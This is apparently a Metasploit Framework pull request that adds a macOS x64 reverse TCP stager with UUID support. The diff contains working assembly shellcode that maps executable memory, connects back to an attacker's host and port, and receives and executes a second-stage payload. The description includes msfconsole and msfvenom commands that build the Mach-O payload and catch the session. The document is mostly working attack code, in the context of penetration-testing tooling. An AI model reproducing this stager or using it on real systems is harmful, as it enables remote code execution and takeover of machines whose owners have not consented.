### PR TITLE
Add UUID support to the OSX x64 reverse_tcp stager

### DIFF
--- a/lib/msf/core/payload/osx/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/osx/x64/reverse_tcp.rb
@@ -1,0 +1,143 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/transport_config'
+require 'msf/core/payload/osx/x64/send_uuid'
+
+module Msf
+
+###
+#
+# Complex reverse_tcp payload generation for OSX ARCH_X64
+#
+###
+module Payload::Osx::ReverseTcp_x64
+
+  include Msf::Payload::TransportConfig
+  include Msf::Payload::Stager
+  include Msf::Payload::Osx::SendUUID_x64
+
+  #
+  # Register reverse_tcp specific options
+  #
+  def initialize(*args)
+    super
+  end
+
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
+  #
+  # Generate and compile the stager
+  #
+  def generate_reverse_tcp(opts={})
+    encoded_port = "%.8x" % [datastore['LPORT'].to_i,2].pack("vv").unpack("N").first
+    encoded_host = "%.8x" % Rex::Socket.addr_aton(datastore['LHOST']||"127.127.127.127").unpack("V").first
+    retry_count = datastore['StagerRetryCount']
+    seconds = datastore['StagerRetryWait']
+    sleep_seconds = seconds.to_i
+    sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
+
+    stager_asm = %(
+    ; mmap(0x0, 0x1000, 0x7, 0x1002, 0x0, 0x0)
+    push 0
+    pop rdi
+    push 0x1000
+    pop rsi
+    push 7
+    pop rdx
+    push 0x1002
+    pop r10
+    push 0
+    pop r8
+    push 0
+    pop r9
+    push 0x20000c5
+    pop rax
+    syscall
+    jb failed
+
+    mov r12, rax
+    push 0
+    pop r10
+    push #{retry_count}
+    pop r11
+
+  socket:
+    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
+    push    2
+    pop     rdi              ; rdi=AF_INET
+    push    1
+    pop     rsi              ; rsi=SOCK_STREAM
+    push    0
+    pop     rdx              ; rdx=IPPROTO_IP
+    push    0x2000061
+    pop     rax
+    syscall
+    jb retry
+
+    ; connect (sockfd, {AF_INET,4444,127.0.0.1}, 16);
+    mov     rdi, rax
+    mov     rax, 0x#{encoded_host}#{encoded_port}
+    push    rax
+    push    rsp
+    pop     rsi
+    push    16
+    pop     rdx
+    push    0x2000062
+    pop     rax
+    syscall
+    jb retry
+
+#{asm_send_uuid if include_send_uuid}
+
+    ; recvfrom(sockfd, addr, 0x1000)
+    mov rsi, r12
+    push 0x1000
+    pop rdx
+    push 0x200001d
+    pop rax
+    syscall
+    jb retry
+
+    call r12
+
+  retry:
+    dec r11
+    jz failed
+
+    push 0
+    pop rdi
+    push 0
+    pop rsi
+    push 0
+    pop rdx
+    push 0
+    pop r10
+    push   0x#{sleep_nanoseconds.to_s(16)}
+    push   0x#{sleep_seconds.to_s(16)}
+    push rsp
+    pop r8
+    push 0x200005d
+    pop rax
+    syscall
+    jmp socket
+
+  failed:
+    push   0x2000001
+    pop    rax
+    push   0x1
+    pop    rdi
+    syscall ; exit(1)
+    )
+
+    Metasm::Shellcode.assemble(Metasm::X64.new, stager_asm).encode_string
+  end
+
+end
+end

--- a/lib/msf/core/payload/osx/x64/send_uuid.rb
+++ b/lib/msf/core/payload/osx/x64/send_uuid.rb
@@ -1,0 +1,42 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/uuid'
+
+module Msf
+
+###
+#
+# Basic send_uuid stub for OSX ARCH_X64 payloads
+#
+###
+
+module Payload::Osx::SendUUID_x64
+
+  #
+  # Generate assembly code that writes the UUID to the socket.
+  #
+  def asm_send_uuid(uuid=nil)
+    uuid ||= generate_payload_uuid
+    uuid_raw = uuid.to_raw
+
+    asm =%Q^
+      send_uuid:
+        call get_uuid_address     ; put uuid buffer on the stack
+        db #{raw_to_db(uuid_raw)} ; UUID
+      get_uuid_address:
+        pop rsi                   ; UUID address
+        push #{uuid_raw.length}   ; length of the UUID
+        pop rdx
+        push 0x2000085
+        pop rax
+        syscall                   ; sendto(sockfd, addr, length)
+    ^
+
+    asm
+  end
+
+end
+
+end
+

--- a/modules/payloads/stagers/osx/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb
@@ -23,6 +23,7 @@ module MetasploitModule
       'Platform'    => 'osx',
       'Arch'        => ARCH_X64,
       'Handler'     => Msf::Handler::ReverseTcp,
+      'Stager'      => { 'RequiresMidstager' => true },
       'Convention'  => 'sockedi',
     ))
   end

--- a/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/osx/x64/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 209
+  CachedSize = 204
 
   include Msf::Payload::Osx::ReverseTcp_x64
   include Msf::Payload::TransportConfig
@@ -27,6 +27,7 @@ module MetasploitModule
       'Platform'    => 'osx',
       'Arch'        => ARCH_X64,
       'Handler'     => Msf::Handler::ReverseTcp,
+      'Stager'      => { 'RequiresMidstager' => true },
       'Convention'  => 'sockedi',
     ))
   end

--- a/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb
@@ -8,23 +8,31 @@ require 'msf/core/payload/osx/x64/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 168
+  CachedSize = 209
 
   include Msf::Payload::Osx::ReverseTcp_x64
   include Msf::Payload::TransportConfig
   include Msf::Payload::Stager
 
+  def self.handler_type_alias
+    'reverse_tcp_uuid'
+  end
+
   def initialize(info = { })
     super(merge_info(info,
-      'Name'        => 'Reverse TCP Stager',
-      'Description' => 'Connect, read length, read buffer, execute',
-      'Author'      => 'nemo <nemo[at]felinemenace.org>',
+      'Name'        => 'Reverse TCP Stager with UUID Support (OSX x64)',
+      'Description' => 'Connect back to the attacker with UUID Support (OSX x64)',
+      'Author'      => 'timwr',
       'License'     => MSF_LICENSE,
       'Platform'    => 'osx',
       'Arch'        => ARCH_X64,
       'Handler'     => Msf::Handler::ReverseTcp,
       'Convention'  => 'sockedi',
     ))
+  end
+
+  def include_send_uuid
+    true
   end
 
   def generate(opts = {})


### PR DESCRIPTION
Fixes https://github.com/rapid7/metasploit-framework/issues/12837
Ping @phra 

## Verification

- [x] `msfconsole -qx "use exploit/multi/handler; set payload osx/x64/meterpreter/reverse_tcp_uuid; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [x] `msfvenom -p osx/x64/meterpreter/reverse_tcp_uuid PayloadUUIDRaw=4142434445464748 LHOST=$LHOST LPORT=4444 -f macho -o met`
- [x] **Verify** you get a session
- [x] **Verify** `sessions -v` shows 4142434445464748 as a UUID

